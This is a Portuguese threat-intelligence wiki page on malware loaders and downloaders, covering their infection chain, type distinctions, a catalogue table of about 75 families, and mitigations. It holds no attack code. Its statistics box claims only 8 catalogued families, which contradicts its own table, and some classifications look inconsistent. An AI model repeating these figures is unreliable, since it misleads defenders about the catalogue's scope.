# Loaders & Downloaders > Malware de primeira fase especializado em estabelecer foothold inicial e carregar payloads adicionais. Loaders sao o ponto de entrada de cadeia de infecção multicamada, frequentemente usados para distribuir ransomware, RATs e stealers em escala. > [!warning] Porta de Entrada para Ataques em Escala > Emotet, QakBot e BazarLoader foram os principais distribuidores de ransomware (Conti, LockBit, Ryuk) no período 2020-2023. A remoção de um loader elimina toda a cadeia de distribuição a jusante, tornando-os alvos prioritarios para takedowns de lei. ## Como Funcionam Loaders executam uma função cirurgica: infectar o maior número possível de maquinas e manter acesso enquanto baixam e executam payloads de alto valor sob demanda dos operadores. ```mermaid graph TB A["📧 MalSpam em Escala<br/>Milhoes de e-mails / dia"] --> B["📎 Documento Malicioso<br/>Word macro / PDF / LNK"] B --> C["🔧 Loader Executa<br/>Evade AV / Unpacks in-memory"] C --> D["📡 Beacon C2<br/>Registra novo bot"] D --> E["⬇️ Payload Download<br/>Ransomware / RAT / Stealer"] E --> F["🎯 Payload Executa<br/>Impacto final no sistema"] D --> G["🔄 Worm Module<br/>Espalha para rede local"] style A fill:#2980b9,color:#fff style B fill:#e74c3c,color:#fff style C fill:#e67e22,color:#fff style D fill:#f39c12,color:#fff style E fill:#8e44ad,color:#fff style F fill:#c0392b,color:#fff style G fill:#d35400,color:#fff ``` **Distinacao entre tipos:** - **Loader** - Carrega e executa payload diretamente na memoria (fileless), sem escrita em disco - **Downloader** - Baixa e executa arquivos do disco; mais simples e detectavel - **Dropper** - Extrai payload embutido no proprio executavel; comum em ataques direcionados ## Familias Catalogadas %% ```dataview TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Subtipo", status AS "Status" FROM "cti/software/malware/loaders" WHERE type = "malware" SORT title ASC ``` %% <!-- QueryToSerialize: TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Subtipo", status AS "Status" FROM "cti/software/malware/loaders" WHERE type = "malware" SORT title ASC --> <!-- SerializedQuery: TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Subtipo", status AS "Status" FROM "cti/software/malware/loaders" WHERE type = "malware" SORT title ASC --> | Nome | Subtipo | Status | | -------------------------------------------------------------------------- | ---------- | -------- | | [[s0469-abk\|ABK]] | loader | active | | [[s0473-avenger\|Avenger]] | loader | active | | [[s0642-badflick\|BADFLICK]] | loader | active | | [[cti/software/malware/loaders/bazarloader.md\|BazarLoader]] | loader | inactive | | [[s0470-bbk\|BBK]] | loader | active | | [[s0520-blindingcan\|BLINDINGCAN]] | loader | active | | [[s0635-boombox\|BoomBox]] | loader | active | | [[s0415-boostwrite\|BOOSTWRITE]] | loader | active | | [[s0471-builddowner\|build_downer]] | loader | active | | [[bumblebee\|Bumblebee]] | loader | active | | [[s0462-carrotbat\|CARROTBAT]] | loader | active | | [[s0137-coreshell\|CORESHELL]] | loader | active | | [[s0614-costabricks\|CostaBricks]] | loader | active | | [[cuba\|Cuba]] | loader | active | | [[s0472-downnew\|down_new]] | loader | active | | [[s0134-downdelph\|Downdelph]] | loader | active | | [[dridex\|Dridex]] | loader | active | | [[s0624-ecipekac\|Ecipekac]] | loader | active | | [[s0367-emotet\|Emotet]] | loader | active | | [[s0696-flagpro\|Flagpro]] | downloader | active | | [[s0628-fyanti\|FYAnti]] | loader | active | | [[s0488-gelup\|GELUP]] | downloader | active | | [[cti/software/malware/loaders/gh0st-rat.md\|gh0st RAT]] | rat | active | | [[ghostpulse\|GHOSTPULSE]] | loader | active | | [[s0499-hancitor\|Hancitor]] | loader | inactive | | [[s0214-happywork\|HAPPYWORK]] | loader | active | | [[s1249-hexeval-loader\|HexEval Loader]] | loader | active | | [[s0203-hydraq\|Hydraq]] | loader | active | | [[s0483-icedid\|IcedID]] | loader | active | | [[icesxpert\|IceSXpert]] | loader | active | | [[s1152-imaploader\|IMAPLoader]] | loader | active | | [[s0585-kerrdown\|Kerrdown]] | loader | active | | [[koctopus\|KOCTOPUS]] | loader | active | | [[s0408-lazarus-loader\|Lazarus Loader]] | loader | active | | [[s1095-lightlet\|Lightlet]] | loader | active | | [[s1185-lightspy\|LightSpy]] | loader | active | | [[s0680-litepower\|LitePower]] | loader | active | | [[s0042-lowball\|LOWBALL]] | loader | active | | [[matanbuchus\|Matanbuchus]] | loader | active | | [[s0051-miniduke\|MiniDuke]] | loader | active | | [[s0284-moreeggs\|More_eggs]] | loader | active | | [[s0256-mosquito\|Mosquito]] | loader | active | | [[s0247-navrat\|NavRAT]] | loader | active | | [[s1170-odagent\|ODAgent]] | loader | active | | [[s1172-oilbooster\|OilBooster]] | loader | active | | [[s1171-oilcheck\|OilCheck]] | loader | active | | [[s0264-oopsie\|OopsIE]] | loader | active | | [[s0402-osxshlayer\|OSX/Shlayer]] | loader | active | | [[s0626-p8rat\|P8RAT]] | loader | active | | [[pikabot\|Pikabot]] | loader | active | | [[s0254-plaintee\|PLAINTEE]] | loader | inactive | | [[s0518-polyglotduke\|PolyglotDuke]] | loader | inactive | | [[s0177-power-loader\|Power Loader]] | loader | inactive | | [[s0685-powerpunch\|PowerPunch]] | loader | active | | [[s1046-powgoop\|PowGoop]] | loader | active | | [[cti/software/malware/loaders/privateloader.md\|PrivateLoader]] | loader | active | | [[s0613-ps1\|PS1]] | loader | active | | [[s1228-pubload\|PUBLOAD]] | loader | active | | [[s0650-qakbot\|QakBot]] | loader | active | | [[s0258-rgdoor\|RGDoor]] | loader | active | | [[s1018-saint-bot\|Saint Bot]] | loader | active | | [[s1168-samplecheck5000\|SampleCheck5000]] | loader | active | | [[s1089-sharpdisco\|SharpDisco]] | loader | active | | [[s0217-shutterspeed\|SHUTTERSPEED]] | loader | active | | [[s0226-smokeloader\|SmokeLoader]] | loader | active | | [[s1124-socgholish\|SocGholish]] | loader | active | | [[s0516-sorefang\|SoreFang]] | loader | active | | [[squirrelwaffle\|Squirrelwaffle]] | loader | active | | [[s1238-staticplugin\|STATICPLUGIN]] | loader | active | | [[s1064-svcready\|SVCReady]] | loader | active | | [[s0386-ursnif\|Ursnif]] | loader | active | | [[s0636-vaporrage\|VaporRage]] | loader | active | | [[s0442-vbshower\|VBShower]] | loader | active | | [[s1248-xorindex-loader\|XORIndex Loader]] | loader | active | | [[s0388-yahoyah\|YAHOYAH]] | loader | active | <!-- SerializedQuery END --> > [!info] Estatisticas > **8 familias** catalogadas (6 loaders + 2 downloaders) - Categoria de menor número mas maior impacto operacional - Emotet e QakBot distribuiram a maioria dos ransomwares de 2020-2023 ## Defesas e Mitigacoes - [[m1049-antivirus-antimalware|M1049 - Antivirus/Antimalware]] - Detecção de macro maliciosa em Office - [[m1040-behavior-prevention-on-endpoint|M1040 - Behavior Prevention on Endpoint]] - Bloquear spawning de processos suspeitos - Desabilitar macros VBA em documentos Office de fontes externas - [[m1021-restrict-web-based-content|M1021 - Restrict Web-Based Content]] - Filtrar downloads de dominios C2 conhecidos - Monitorar execução de powershell com parametros obfuscados ## Relacionados [[_malware]] - [[_groups]] - [[t1105-ingress-tool-transfer|T1105 - Ingress Tool Transfer]] - [[t1204-002-malicious-file|T1204.002 - Malicious File]] - [[t1059-001-powershell|T1059.001 - PowerShell]]